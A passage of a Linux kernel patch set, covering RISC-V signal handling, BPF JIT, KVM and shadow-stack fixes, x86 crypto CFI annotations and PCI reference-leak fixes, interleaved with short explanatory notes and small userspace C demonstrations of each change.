++ * _TIF_WORK_MASK. Entered from assembly with IRQs off.
+  */
+-asmlinkage __visible void do_notify_resume(struct pt_regs *regs,
+-					   unsigned long thread_info_flags)
++asmlinkage __visible void do_work_pending(struct pt_regs *regs,
++					  unsigned long thread_info_flags)
+ {
+-	if (thread_info_flags & _TIF_UPROBE)
+-		uprobe_notify_resume(regs);
+-
+-	/* Handle pending signal delivery */
+-	if (thread_info_flags & (_TIF_SIGPENDING | _TIF_NOTIFY_SIGNAL))
+-		do_signal(regs);
+-
+-	if (thread_info_flags & _TIF_NOTIFY_RESUME)
+-		resume_user_mode_work(regs);
++	do {
++		if (thread_info_flags & _TIF_NEED_RESCHED) {
++			schedule();
++		} else {
++			local_irq_enable();
++			if (thread_info_flags & _TIF_UPROBE)
++				uprobe_notify_resume(regs);
++			/* Handle pending signal delivery */
++			if (thread_info_flags & (_TIF_SIGPENDING |
++						 _TIF_NOTIFY_SIGNAL))
++				do_signal(regs);
++			if (thread_info_flags & _TIF_NOTIFY_RESUME)
++				resume_user_mode_work(regs);
++		}
++		local_irq_disable();
++		thread_info_flags = read_thread_flags();
++	} while (thread_info_flags & _TIF_WORK_MASK);
+ }
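
The rewritten slow path loops until no work flag remains: reschedule work goes straight to schedule(), otherwise interrupts are enabled for the uprobe/signal/notify handlers, then disabled again and the flags re-read so that nothing set in the meantime is lost before returning to userspace. A userspace simulation of that re-check loop — the flag names mirror the patch, everything else is a stand-in:

#include <stdio.h>

#define _TIF_NEED_RESCHED  (1u << 0)
#define _TIF_SIGPENDING    (1u << 1)
#define _TIF_WORK_MASK     (_TIF_NEED_RESCHED | _TIF_SIGPENDING)

static unsigned int flags = _TIF_NEED_RESCHED | _TIF_SIGPENDING;

/* Stand-in for read_thread_flags(); in the kernel, new bits may have
 * been set while the previous batch of work was being handled. */
static unsigned int read_flags(void) { return flags; }

static void handle(unsigned int f)
{
	if (f & _TIF_NEED_RESCHED) {
		puts("schedule()");
		flags &= ~_TIF_NEED_RESCHED;
	} else if (f & _TIF_SIGPENDING) {
		puts("do_signal()");
		flags &= ~_TIF_SIGPENDING;
	}
}

int main(void)
{
	unsigned int f = read_flags();

	do {                        /* same shape as do_work_pending() */
		handle(f);
		f = read_flags();   /* re-check before returning */
	} while (f & _TIF_WORK_MASK);
	return 0;
}
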
+diff --git a/arch/riscv/kernel/traps.c b/arch/riscv/kernel/traps.c
+index 7abd8e4c4df63..f77cb8e42bd2a 100644
+--- a/arch/riscv/kernel/traps.c
++++ b/arch/riscv/kernel/traps.c
+@@ -214,7 +214,7 @@ static DEFINE_PER_CPU(unsigned long [OVERFLOW_STACK_SIZE/sizeof(long)],
+  * shadow stack, handled_ kernel_ stack_ overflow(in kernel/entry.S) is used
+  * to get per-cpu overflow stack(get_overflow_stack).
+  */
+-long shadow_stack[SHADOW_OVERFLOW_STACK_SIZE/sizeof(long)];
++long shadow_stack[SHADOW_OVERFLOW_STACK_SIZE/sizeof(long)] __aligned(16);
+ asmlinkage unsigned long get_overflow_stack(void)
+ {
+ 	return (unsigned long)this_cpu_ptr(overflow_stack) +
+diff --git a/arch/riscv/kvm/vcpu.c b/arch/riscv/kvm/vcpu.c
+index 71ebbc4821f0e..5174ef54ad1d9 100644
+--- a/arch/riscv/kvm/vcpu.c
++++ b/arch/riscv/kvm/vcpu.c
+@@ -296,12 +296,15 @@ static int kvm_riscv_vcpu_set_reg_config(struct kvm_vcpu *vcpu,
+ 	if (copy_from_user(&reg_val, uaddr, KVM_REG_SIZE(reg->id)))
+ 		return -EFAULT;
+ 
+-	/* This ONE REG interface is only defined for single letter extensions */
+-	if (fls(reg_val) >= RISCV_ISA_EXT_BASE)
+-		return -EINVAL;
+-
+ 	switch (reg_num) {
+ 	case KVM_REG_RISCV_CONFIG_REG(isa):
++		/*
++		 * This ONE REG interface is only defined for
++		 * single letter extensions.
++		 */
++		if (fls(reg_val) >= RISCV_ISA_EXT_BASE)
++			return -EINVAL;
++
+ 		if (!vcpu->arch.ran_atleast_once) {
+ 			/* Ignore the enable/disable request for certain extensions */
+ 			for (i = 0; i < RISCV_ISA_EXT_BASE; i++) {
+diff --git a/arch/riscv/mm/physaddr.c b/arch/riscv/mm/physaddr.c
+index 19cf25a74ee29..9b18bda74154e 100644
+--- a/arch/riscv/mm/physaddr.c
++++ b/arch/riscv/mm/physaddr.c
+@@ -22,7 +22,7 @@ EXPORT_SYMBOL(__virt_to_phys);
+ phys_addr_t __phys_addr_symbol(unsigned long x)
+ {
+ 	unsigned long kernel_start = kernel_map.virt_addr;
+-	unsigned long kernel_end = (unsigned long)_end;
++	unsigned long kernel_end = kernel_start + kernel_map.size;
+ 
+ 	/*
+ 	 * Boundary checking aginst the kernel image mapping.
+diff --git a/arch/riscv/net/bpf_jit_comp64.c b/arch/riscv/net/bpf_jit_comp64.c
+index 00df3a8f92acd..f2417ac54edd6 100644
+--- a/arch/riscv/net/bpf_jit_comp64.c
++++ b/arch/riscv/net/bpf_jit_comp64.c
+@@ -136,6 +136,25 @@ static bool in_auipc_jalr_range(s64 val)
+ 		val < ((1L << 31) - (1L << 11));
+ }
+ 
++/* Emit fixed-length instructions for address */
++static int emit_addr(u8 rd, u64 addr, bool extra_pass, struct rv_jit_context *ctx)
++{
++	u64 ip = (u64)(ctx->insns + ctx->ninsns);
++	s64 off = addr - ip;
++	s64 upper = (off + (1 << 11)) >> 12;
++	s64 lower = off & 0xfff;
++
++	if (extra_pass && !in_auipc_jalr_range(off)) {
++		pr_err("bpf-jit: target offset 0x%llx is out of range\n", off);
++		return -ERANGE;
++	}
++
++	emit(rv_auipc(rd, upper), ctx);
++	emit(rv_addi(rd, rd, lower), ctx);
++	return 0;
++}
++
++/* Emit variable-length instructions for 32-bit and 64-bit imm */
+ static void emit_imm(u8 rd, s64 val, struct rv_jit_context *ctx)
+ {
+ 	/* Note that the immediate from the add is sign-extended,
+@@ -1050,7 +1069,15 @@ out_be:
+ 		u64 imm64;
+ 
+ 		imm64 = (u64)insn1.imm << 32 | (u32)imm;
+-		emit_imm(rd, imm64, ctx);
++		if (bpf_pseudo_func(insn)) {
++			/* fixed-length insns for extra jit pass */
++			ret = emit_addr(rd, imm64, extra_pass, ctx);
++			if (ret)
++				return ret;
++		} else {
++			emit_imm(rd, imm64, ctx);
++		}
++
+ 		return 1;
+ 	}
+ 
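
emit_addr() always emits exactly two instructions, AUIPC plus ADDI, so the extra JIT pass can patch addresses in place without the instruction stream changing length (emit_imm(), by contrast, is variable-length). AUIPC contributes upper << 12 relative to the PC and ADDI a sign-extended 12-bit immediate, which is why the upper part is rounded with +(1 << 11). A standalone check of that arithmetic:

#include <stdio.h>
#include <stdint.h>

/* Split a PC-relative offset the way emit_addr() does: AUIPC gets the
 * rounded upper 20 bits, ADDI the low 12 bits (sign-extended by HW). */
static void split(int64_t off, int64_t *upper, int64_t *lower)
{
	*upper = (off + (1 << 11)) >> 12;
	*lower = ((off & 0xfff) ^ 0x800) - 0x800;   /* sext12 */
}

int main(void)
{
	const int64_t tests[] = { 0, 1, -1, 2047, 2048, -2048, 123456 };
	size_t i;

	for (i = 0; i < sizeof(tests) / sizeof(tests[0]); i++) {
		int64_t up, lo;

		split(tests[i], &up, &lo);
		printf("off=%7lld -> auipc %7lld, addi %5lld, sum %7lld\n",
		       (long long)tests[i], (long long)up, (long long)lo,
		       (long long)(up * 4096 + lo));
	}
	return 0;
}

Every "sum" column reproduces the original offset, confirming that the AUIPC/ADDI pair reaches any target inside the in_auipc_jalr_range() window.
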
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index 67745ceab0dbc..b2c0fce3f257c 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -462,8 +462,8 @@ config X86_X2APIC
+ 
+ 	  Some Intel systems circa 2022 and later are locked into x2APIC mode
+ 	  and can not fall back to the legacy APIC modes if SGX or TDX are
+-	  enabled in the BIOS.  They will be unable to boot without enabling
+-	  this option.
++	  enabled in the BIOS. They will boot with very reduced functionality
++	  without enabling this option.
+ 
+ 	  If you don't know what to do here, say N.
+ 
+diff --git a/arch/x86/crypto/aegis128-aesni-asm.S b/arch/x86/crypto/aegis128-aesni-asm.S
+index b48ddebb47489..cdf3215ec272c 100644
+--- a/arch/x86/crypto/aegis128-aesni-asm.S
++++ b/arch/x86/crypto/aegis128-aesni-asm.S
+@@ -7,6 +7,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ #include <asm/frame.h>
+ 
+ #define STATE0	%xmm0
+@@ -402,7 +403,7 @@ SYM_FUNC_END(crypto_aegis128_aesni_ad)
+  * void crypto_aegis128_aesni_enc(void *state, unsigned int length,
+  *                                const void *src, void *dst);
+  */
+-SYM_FUNC_START(crypto_aegis128_aesni_enc)
++SYM_TYPED_FUNC_START(crypto_aegis128_aesni_enc)
+ 	FRAME_BEGIN
+ 
+ 	cmp $0x10, LEN
+@@ -499,7 +500,7 @@ SYM_FUNC_END(crypto_aegis128_aesni_enc)
+  * void crypto_aegis128_aesni_enc_tail(void *state, unsigned int length,
+  *                                     const void *src, void *dst);
+  */
+-SYM_FUNC_START(crypto_aegis128_aesni_enc_tail)
++SYM_TYPED_FUNC_START(crypto_aegis128_aesni_enc_tail)
+ 	FRAME_BEGIN
+ 
+ 	/* load the state: */
+@@ -556,7 +557,7 @@ SYM_FUNC_END(crypto_aegis128_aesni_enc_tail)
+  * void crypto_aegis128_aesni_dec(void *state, unsigned int length,
+  *                                const void *src, void *dst);
+  */
+-SYM_FUNC_START(crypto_aegis128_aesni_dec)
++SYM_TYPED_FUNC_START(crypto_aegis128_aesni_dec)
+ 	FRAME_BEGIN
+ 
+ 	cmp $0x10, LEN
+@@ -653,7 +654,7 @@ SYM_FUNC_END(crypto_aegis128_aesni_dec)
+  * void crypto_aegis128_aesni_dec_tail(void *state, unsigned int length,
+  *                                     const void *src, void *dst);
+  */
+-SYM_FUNC_START(crypto_aegis128_aesni_dec_tail)
++SYM_TYPED_FUNC_START(crypto_aegis128_aesni_dec_tail)
+ 	FRAME_BEGIN
+ 
+ 	/* load the state: */
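
Switching these entry points (and the aria, sha1/sha256/sha512, sm3 and sm4 helpers in the hunks that follow) from SYM_FUNC_START to SYM_TYPED_FUNC_START matters because they are called indirectly through function pointers: with clang kernel CFI (CONFIG_CFI_CLANG) every indirect call first checks a type hash stored alongside the callee, and assembly functions only receive that hash when declared via the typed macro. A loose C illustration of the prototype matching the hash encodes — ordinary C, no CFI instrumentation needed to compile:

#include <stdio.h>

/* kCFI derives the hash from this exact prototype; an indirect call
 * through crypt_fn to a function of any other type would trap. */
typedef void (*crypt_fn)(void *state, unsigned int length,
			 const void *src, void *dst);

static void enc(void *state, unsigned int length,
		const void *src, void *dst)
{
	(void)state; (void)src; (void)dst;
	printf("encrypt %u bytes\n", length);
}

int main(void)
{
	crypt_fn fn = enc;   /* same prototype: allowed under kCFI */

	fn(NULL, 16, NULL, NULL);
	return 0;
}
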
+diff --git a/arch/x86/crypto/aria-aesni-avx-asm_64.S b/arch/x86/crypto/aria-aesni-avx-asm_64.S
+index c75fd7d015ed8..03ae4cd1d976a 100644
+--- a/arch/x86/crypto/aria-aesni-avx-asm_64.S
++++ b/arch/x86/crypto/aria-aesni-avx-asm_64.S
+@@ -7,6 +7,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ #include <asm/frame.h>
+ 
+ /* struct aria_ctx: */
+@@ -913,7 +914,7 @@ SYM_FUNC_START_LOCAL(__aria_aesni_avx_crypt_16way)
+ 	RET;
+ SYM_FUNC_END(__aria_aesni_avx_crypt_16way)
+ 
+-SYM_FUNC_START(aria_aesni_avx_encrypt_16way)
++SYM_TYPED_FUNC_START(aria_aesni_avx_encrypt_16way)
+ 	/* input:
+ 	*      %rdi: ctx, CTX
+ 	*      %rsi: dst
+@@ -938,7 +939,7 @@ SYM_FUNC_START(aria_aesni_avx_encrypt_16way)
+ 	RET;
+ SYM_FUNC_END(aria_aesni_avx_encrypt_16way)
+ 
+-SYM_FUNC_START(aria_aesni_avx_decrypt_16way)
++SYM_TYPED_FUNC_START(aria_aesni_avx_decrypt_16way)
+ 	/* input:
+ 	*      %rdi: ctx, CTX
+ 	*      %rsi: dst
+@@ -1039,7 +1040,7 @@ SYM_FUNC_START_LOCAL(__aria_aesni_avx_ctr_gen_keystream_16way)
+ 	RET;
+ SYM_FUNC_END(__aria_aesni_avx_ctr_gen_keystream_16way)
+ 
+-SYM_FUNC_START(aria_aesni_avx_ctr_crypt_16way)
++SYM_TYPED_FUNC_START(aria_aesni_avx_ctr_crypt_16way)
+ 	/* input:
+ 	*      %rdi: ctx
+ 	*      %rsi: dst
+@@ -1208,7 +1209,7 @@ SYM_FUNC_START_LOCAL(__aria_aesni_avx_gfni_crypt_16way)
+ 	RET;
+ SYM_FUNC_END(__aria_aesni_avx_gfni_crypt_16way)
+ 
+-SYM_FUNC_START(aria_aesni_avx_gfni_encrypt_16way)
++SYM_TYPED_FUNC_START(aria_aesni_avx_gfni_encrypt_16way)
+ 	/* input:
+ 	*      %rdi: ctx, CTX
+ 	*      %rsi: dst
+@@ -1233,7 +1234,7 @@ SYM_FUNC_START(aria_aesni_avx_gfni_encrypt_16way)
+ 	RET;
+ SYM_FUNC_END(aria_aesni_avx_gfni_encrypt_16way)
+ 
+-SYM_FUNC_START(aria_aesni_avx_gfni_decrypt_16way)
++SYM_TYPED_FUNC_START(aria_aesni_avx_gfni_decrypt_16way)
+ 	/* input:
+ 	*      %rdi: ctx, CTX
+ 	*      %rsi: dst
+@@ -1258,7 +1259,7 @@ SYM_FUNC_START(aria_aesni_avx_gfni_decrypt_16way)
+ 	RET;
+ SYM_FUNC_END(aria_aesni_avx_gfni_decrypt_16way)
+ 
+-SYM_FUNC_START(aria_aesni_avx_gfni_ctr_crypt_16way)
++SYM_TYPED_FUNC_START(aria_aesni_avx_gfni_ctr_crypt_16way)
+ 	/* input:
+ 	*      %rdi: ctx
+ 	*      %rsi: dst
+diff --git a/arch/x86/crypto/sha1_ni_asm.S b/arch/x86/crypto/sha1_ni_asm.S
+index 2f94ec0e763bf..3cae5a1bb3d6e 100644
+--- a/arch/x86/crypto/sha1_ni_asm.S
++++ b/arch/x86/crypto/sha1_ni_asm.S
+@@ -54,6 +54,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ #define DIGEST_PTR	%rdi	/* 1st arg */
+ #define DATA_PTR	%rsi	/* 2nd arg */
+@@ -93,7 +94,7 @@
+  */
+ .text
+ .align 32
+-SYM_FUNC_START(sha1_ni_transform)
++SYM_TYPED_FUNC_START(sha1_ni_transform)
+ 	push		%rbp
+ 	mov		%rsp, %rbp
+ 	sub		$FRAME_SIZE, %rsp
+diff --git a/arch/x86/crypto/sha1_ssse3_asm.S b/arch/x86/crypto/sha1_ssse3_asm.S
+index 263f916362e02..f54988c80eb40 100644
+--- a/arch/x86/crypto/sha1_ssse3_asm.S
++++ b/arch/x86/crypto/sha1_ssse3_asm.S
+@@ -25,6 +25,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ #define CTX	%rdi	// arg1
+ #define BUF	%rsi	// arg2
+@@ -67,7 +68,7 @@
+  * param: function's name
+  */
+ .macro SHA1_VECTOR_ASM  name
+-	SYM_FUNC_START(\name)
++	SYM_TYPED_FUNC_START(\name)
+ 
+ 	push	%rbx
+ 	push	%r12
+diff --git a/arch/x86/crypto/sha256-avx-asm.S b/arch/x86/crypto/sha256-avx-asm.S
+index 3baa1ec390974..06ea30c20828d 100644
+--- a/arch/x86/crypto/sha256-avx-asm.S
++++ b/arch/x86/crypto/sha256-avx-asm.S
+@@ -48,6 +48,7 @@
+ ########################################################################
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ ## assume buffers not aligned
+ #define    VMOVDQ vmovdqu
+@@ -346,7 +347,7 @@ a = TMP_
+ ## arg 3 : Num blocks
+ ########################################################################
+ .text
+-SYM_FUNC_START(sha256_transform_avx)
++SYM_TYPED_FUNC_START(sha256_transform_avx)
+ .align 32
+ 	pushq   %rbx
+ 	pushq   %r12
+diff --git a/arch/x86/crypto/sha256-avx2-asm.S b/arch/x86/crypto/sha256-avx2-asm.S
+index 9bcdbc47b8b4b..2d2be531a11ed 100644
+--- a/arch/x86/crypto/sha256-avx2-asm.S
++++ b/arch/x86/crypto/sha256-avx2-asm.S
+@@ -49,6 +49,7 @@
+ ########################################################################
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ ## assume buffers not aligned
+ #define	VMOVDQ vmovdqu
+@@ -523,7 +524,7 @@ STACK_SIZE	= _CTX      + _CTX_SIZE
+ ## arg 3 : Num blocks
+ ########################################################################
+ .text
+-SYM_FUNC_START(sha256_transform_rorx)
++SYM_TYPED_FUNC_START(sha256_transform_rorx)
+ .align 32
+ 	pushq	%rbx
+ 	pushq	%r12
+diff --git a/arch/x86/crypto/sha256-ssse3-asm.S b/arch/x86/crypto/sha256-ssse3-asm.S
+index c4a5db612c327..7db28839108dd 100644
+--- a/arch/x86/crypto/sha256-ssse3-asm.S
++++ b/arch/x86/crypto/sha256-ssse3-asm.S
+@@ -47,6 +47,7 @@
+ ########################################################################
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ ## assume buffers not aligned
+ #define    MOVDQ movdqu
+@@ -355,7 +356,7 @@ a = TMP_
+ ## arg 3 : Num blocks
+ ########################################################################
+ .text
+-SYM_FUNC_START(sha256_transform_ssse3)
++SYM_TYPED_FUNC_START(sha256_transform_ssse3)
+ .align 32
+ 	pushq   %rbx
+ 	pushq   %r12
+diff --git a/arch/x86/crypto/sha256_ni_asm.S b/arch/x86/crypto/sha256_ni_asm.S
+index 94d50dd27cb53..47f93937f798a 100644
+--- a/arch/x86/crypto/sha256_ni_asm.S
++++ b/arch/x86/crypto/sha256_ni_asm.S
+@@ -54,6 +54,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ #define DIGEST_PTR	%rdi	/* 1st arg */
+ #define DATA_PTR	%rsi	/* 2nd arg */
+@@ -97,7 +98,7 @@
+ 
+ .text
+ .align 32
+-SYM_FUNC_START(sha256_ni_transform)
++SYM_TYPED_FUNC_START(sha256_ni_transform)
+ 
+ 	shl		$6, NUM_BLKS		/*  convert to bytes */
+ 	jz		.Ldone_hash
+diff --git a/arch/x86/crypto/sha512-avx-asm.S b/arch/x86/crypto/sha512-avx-asm.S
+index 1fefe6dd3a9e2..b0984f19fdb40 100644
+--- a/arch/x86/crypto/sha512-avx-asm.S
++++ b/arch/x86/crypto/sha512-avx-asm.S
+@@ -48,6 +48,7 @@
+ ########################################################################
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ .text
+ 
+@@ -273,7 +274,7 @@ frame_size = frame_WK + WK_SIZE
+ # of SHA512 message blocks.
+ # "blocks" is the message length in SHA512 blocks
+ ########################################################################
+-SYM_FUNC_START(sha512_transform_avx)
++SYM_TYPED_FUNC_START(sha512_transform_avx)
+ 	test msglen, msglen
+ 	je nowork
+ 
+diff --git a/arch/x86/crypto/sha512-avx2-asm.S b/arch/x86/crypto/sha512-avx2-asm.S
+index 5cdaab7d69015..b1ca99055ef99 100644
+--- a/arch/x86/crypto/sha512-avx2-asm.S
++++ b/arch/x86/crypto/sha512-avx2-asm.S
+@@ -50,6 +50,7 @@
+ ########################################################################
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ .text
+ 
+@@ -565,7 +566,7 @@ frame_size = frame_CTX + CTX_SIZE
+ # of SHA512 message blocks.
+ # "blocks" is the message length in SHA512 blocks
+ ########################################################################
+-SYM_FUNC_START(sha512_transform_rorx)
++SYM_TYPED_FUNC_START(sha512_transform_rorx)
+ 	# Save GPRs
+ 	push	%rbx
+ 	push	%r12
+diff --git a/arch/x86/crypto/sha512-ssse3-asm.S b/arch/x86/crypto/sha512-ssse3-asm.S
+index b84c22e06c5f7..c06afb5270e5f 100644
+--- a/arch/x86/crypto/sha512-ssse3-asm.S
++++ b/arch/x86/crypto/sha512-ssse3-asm.S
+@@ -48,6 +48,7 @@
+ ########################################################################
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ .text
+ 
+@@ -274,7 +275,7 @@ frame_size = frame_WK + WK_SIZE
+ # of SHA512 message blocks.
+ # "blocks" is the message length in SHA512 blocks.
+ ########################################################################
+-SYM_FUNC_START(sha512_transform_ssse3)
++SYM_TYPED_FUNC_START(sha512_transform_ssse3)
+ 
+ 	test msglen, msglen
+ 	je nowork
+diff --git a/arch/x86/crypto/sm3-avx-asm_64.S b/arch/x86/crypto/sm3-avx-asm_64.S
+index b12b9efb5ec51..8fc5ac681fd63 100644
+--- a/arch/x86/crypto/sm3-avx-asm_64.S
++++ b/arch/x86/crypto/sm3-avx-asm_64.S
+@@ -12,6 +12,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ #include <asm/frame.h>
+ 
+ /* Context structure */
+@@ -328,7 +329,7 @@
+  *                        const u8 *data, int nblocks);
+  */
+ .align 16
+-SYM_FUNC_START(sm3_transform_avx)
++SYM_TYPED_FUNC_START(sm3_transform_avx)
+ 	/* input:
+ 	 *	%rdi: ctx, CTX
+ 	 *	%rsi: data (64*nblks bytes)
+diff --git a/arch/x86/crypto/sm4-aesni-avx-asm_64.S b/arch/x86/crypto/sm4-aesni-avx-asm_64.S
+index 4767ab61ff489..22b6560eb9e1e 100644
+--- a/arch/x86/crypto/sm4-aesni-avx-asm_64.S
++++ b/arch/x86/crypto/sm4-aesni-avx-asm_64.S
+@@ -14,6 +14,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ #include <asm/frame.h>
+ 
+ #define rRIP         (%rip)
+@@ -420,7 +421,7 @@ SYM_FUNC_END(sm4_aesni_avx_crypt8)
+  *                                 const u8 *src, u8 *iv)
+  */
+ .align 8
+-SYM_FUNC_START(sm4_aesni_avx_ctr_enc_blk8)
++SYM_TYPED_FUNC_START(sm4_aesni_avx_ctr_enc_blk8)
+ 	/* input:
+ 	 *	%rdi: round key array, CTX
+ 	 *	%rsi: dst (8 blocks)
+@@ -495,7 +496,7 @@ SYM_FUNC_END(sm4_aesni_avx_ctr_enc_blk8)
+  *                                 const u8 *src, u8 *iv)
+  */
+ .align 8
+-SYM_FUNC_START(sm4_aesni_avx_cbc_dec_blk8)
++SYM_TYPED_FUNC_START(sm4_aesni_avx_cbc_dec_blk8)
+ 	/* input:
+ 	 *	%rdi: round key array, CTX
+ 	 *	%rsi: dst (8 blocks)
+@@ -545,7 +546,7 @@ SYM_FUNC_END(sm4_aesni_avx_cbc_dec_blk8)
+  *                                 const u8 *src, u8 *iv)
+  */
+ .align 8
+-SYM_FUNC_START(sm4_aesni_avx_cfb_dec_blk8)
++SYM_TYPED_FUNC_START(sm4_aesni_avx_cfb_dec_blk8)
+ 	/* input:
+ 	 *	%rdi: round key array, CTX
+ 	 *	%rsi: dst (8 blocks)
+diff --git a/arch/x86/crypto/sm4-aesni-avx2-asm_64.S b/arch/x86/crypto/sm4-aesni-avx2-asm_64.S
+index 4732fe8bb65b6..23ee39a8ada8c 100644
+--- a/arch/x86/crypto/sm4-aesni-avx2-asm_64.S
++++ b/arch/x86/crypto/sm4-aesni-avx2-asm_64.S
+@@ -14,6 +14,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ #include <asm/frame.h>
+ 
+ #define rRIP         (%rip)
+@@ -282,7 +283,7 @@ SYM_FUNC_END(__sm4_crypt_blk16)
+  *                                   const u8 *src, u8 *iv)
+  */
+ .align 8
+-SYM_FUNC_START(sm4_aesni_avx2_ctr_enc_blk16)
++SYM_TYPED_FUNC_START(sm4_aesni_avx2_ctr_enc_blk16)
+ 	/* input:
+ 	 *	%rdi: round key array, CTX
+ 	 *	%rsi: dst (16 blocks)
+@@ -395,7 +396,7 @@ SYM_FUNC_END(sm4_aesni_avx2_ctr_enc_blk16)
+  *                                   const u8 *src, u8 *iv)
+  */
+ .align 8
+-SYM_FUNC_START(sm4_aesni_avx2_cbc_dec_blk16)
++SYM_TYPED_FUNC_START(sm4_aesni_avx2_cbc_dec_blk16)
+ 	/* input:
+ 	 *	%rdi: round key array, CTX
+ 	 *	%rsi: dst (16 blocks)
+@@ -449,7 +450,7 @@ SYM_FUNC_END(sm4_aesni_avx2_cbc_dec_blk16)
+  *                                   const u8 *src, u8 *iv)
+  */
+ .align 8
+-SYM_FUNC_START(sm4_aesni_avx2_cfb_dec_blk16)
++SYM_TYPED_FUNC_START(sm4_aesni_avx2_cfb_dec_blk16)
+ 	/* input:
+ 	 *	%rdi: round key array, CTX
+ 	 *	%rsi: dst (16 blocks)
+diff --git a/arch/x86/events/intel/uncore_snb.c b/arch/x86/events/intel/uncore_snb.c
+index 1ef4f7861e2ec..1f4869227efb9 100644
+--- a/arch/x86/events/intel/uncore_snb.c
++++ b/arch/x86/events/intel/uncore_snb.c
+@@ -1338,6 +1338,7 @@ static void __uncore_imc_init_box(struct intel_uncore_box *box,
+ 	/* MCHBAR is disabled */
+ 	if (!(mch_bar & BIT(0))) {
+ 		pr_warn("perf uncore: MCHBAR is disabled. Failed to map IMC free-running counters.\n");
++		pci_dev_put(pdev);
+ 		return;
+ 	}
+ 	mch_bar &= ~BIT(0);
+@@ -1352,6 +1353,8 @@ static void __uncore_imc_init_box(struct intel_uncore_box *box,
+ 	box->io_addr = ioremap(addr, type->mmio_map_size);
+ 	if (!box->io_addr)
+ 		pr_warn("perf uncore: Failed to ioremap for %s.\n", type->name);
++
++	pci_dev_put(pdev);
+ }
+ 
+ static void tgl_uncore_imc_freerunning_init_box(struct intel_uncore_box *box)
+diff --git a/arch/x86/events/intel/uncore_snbep.c b/arch/x86/events/intel/uncore_snbep.c
+index ed869443efb21..fcd95e93f479a 100644
+--- a/arch/x86/events/intel/uncore_snbep.c
++++ b/arch/x86/events/intel/uncore_snbep.c
+@@ -2891,6 +2891,7 @@ static bool hswep_has_limit_sbox(unsigned int device)
+ 		return false;
+ 
+ 	pci_read_config_dword(dev, HSWEP_PCU_CAPID4_OFFET, &capid4);
++	pci_dev_put(dev);
+ 	if (!hswep_get_chop(capid4))
+ 		return true;
+ 
+@@ -4492,6 +4493,8 @@ static int sad_cfg_iio_topology(struct intel_uncore_type *type, u8 *sad_pmon_map
+ 		type->topology = NULL;
+ 	}
+ 
++	pci_dev_put(dev);
++
+ 	return ret;
+ }
+ 
+@@ -4857,6 +4860,8 @@ static int snr_uncore_mmio_map(struct intel_uncore_box *box,
+ 
+ 	addr += box_ctl;
+ 
++	pci_dev_put(pdev);
++
+ 	box->io_addr = ioremap(addr, type->mmio_map_size);
+ 	if (!box->io_addr) {
+ 		pr_warn("perf uncore: Failed to ioremap for %s.\n", type->name);
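
These uncore hunks all fix the same class of leak: the PCI lookup helpers return the struct pci_dev with its reference count raised, and every path out of the function — early error returns included — must drop that reference with pci_dev_put(). A standalone model of the rule, using userspace stand-ins rather than the PCI API:

#include <stdio.h>
#include <stdlib.h>

struct pdev { int ref; };

static struct pdev *get_device(void)   /* lookup returns a held ref */
{
	struct pdev *p = malloc(sizeof(*p));

	p->ref = 1;
	return p;
}

static void put_device(struct pdev *p)
{
	if (p && --p->ref == 0) {
		free(p);
		puts("device released");
	}
}

static int init_box(int bar_enabled)
{
	struct pdev *p = get_device();
	int ret = 0;

	if (!bar_enabled) {
		ret = -1;       /* early exit: the ref must still drop */
		goto out;
	}
	/* ... map and use the device ... */
out:
	put_device(p);
	return ret;
}

int main(void)
{
	init_box(0);
	init_box(1);
	return 0;
}
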
+diff --git a/arch/x86/hyperv/hv_init.c b/arch/x86/hyperv/hv_init.c
+index a269049a43ce3..85863b9c9e684 100644
+--- a/arch/x86/hyperv/hv_init.c
++++ b/arch/x86/hyperv/hv_init.c
+@@ -535,8 +535,6 @@ void hyperv_cleanup(void)
+ 	union hv_x64_msr_hypercall_contents hypercall_msr;
+ 	union hv_reference_tsc_msr tsc_msr;
+ 
+-	unregister_syscore_ops(&hv_syscore_ops);
+-
+ 	/* Reset our OS id */
+ 	wrmsrl(HV_X64_MSR_GUEST_OS_ID, 0);
+ 	hv_ghcb_msr_write(HV_X64_MSR_GUEST_OS_ID, 0);
+diff --git a/arch/x86/include/asm/apic.h b/arch/x86/include/asm/apic.h
+index 3415321c8240c..3216da7074bad 100644
+--- a/arch/x86/include/asm/apic.h
++++ b/arch/x86/include/asm/apic.h
+@@ -249,7 +249,6 @@ static inline u64 native_x2apic_icr_read(void)
+ extern int x2apic_mode;
+ extern int x2apic_phys;
+ extern void __init x2apic_set_max_apicid(u32 apicid);
+-extern void __init check_x2apic(void);
+ extern void x2apic_setup(void);
+ static inline int x2apic_enabled(void)
+ {
+@@ -258,13 +257,13 @@ static inline int x2apic_enabled(void)
+ 
+ #define x2apic_supported()	(boot_cpu_has(X86_FEATURE_X2APIC))
+ #else /* !CONFIG_X86_X2APIC */
+-static inline void check_x2apic(void) { }
+ static inline void x2apic_setup(void) { }
+ static inline int x2apic_enabled(void) { return 0; }
+ 
+ #define x2apic_mode		(0)
+ #define	x2apic_supported()	(0)
+ #endif /* !CONFIG_X86_X2APIC */
++extern void __init check_x2apic(void);
+ 
+ struct irq_data;
+ 
+diff --git a/arch/x86/include/asm/realmode.h b/arch/x86/include/asm/realmode.h
+index fd6f6e5b755a7..a336feef0af14 100644
+--- a/arch/x86/include/asm/realmode.h
++++ b/arch/x86/include/asm/realmode.h
